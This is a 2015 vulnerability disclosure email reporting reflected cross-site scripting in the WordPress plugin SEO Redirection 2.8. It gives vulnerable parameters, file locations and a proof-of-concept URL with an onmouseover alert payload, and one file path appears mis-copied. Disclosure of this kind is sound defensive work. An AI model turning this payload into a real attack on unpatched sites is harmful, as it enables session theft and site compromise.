Subject: Cross-Site Scripting (XSS) in SEO Redirection 2.8
Date: Fri, 21 Aug 2015 09:54:32 +0200

Hello,

Plugin: SEO Redirection 2.8 https://wordpress.org/plugins/seo-redirection/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=[xss]
Vulnerable parameters: search

Example PHP callstack:
/seo-redirection/options/option_page_post_redirection_list.php:46

Verification:
http://localhost/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=%22+onmouseover%3Dalert%281%29+%3E


Identical XSSs are also in:

option_page_404.php (param search) /seo-redirection/options/option_page_404.php:51
option_page_history.php (param search) /seo-redirection/options/option_page_404.php:43


--
Regards,
Marcin Probola,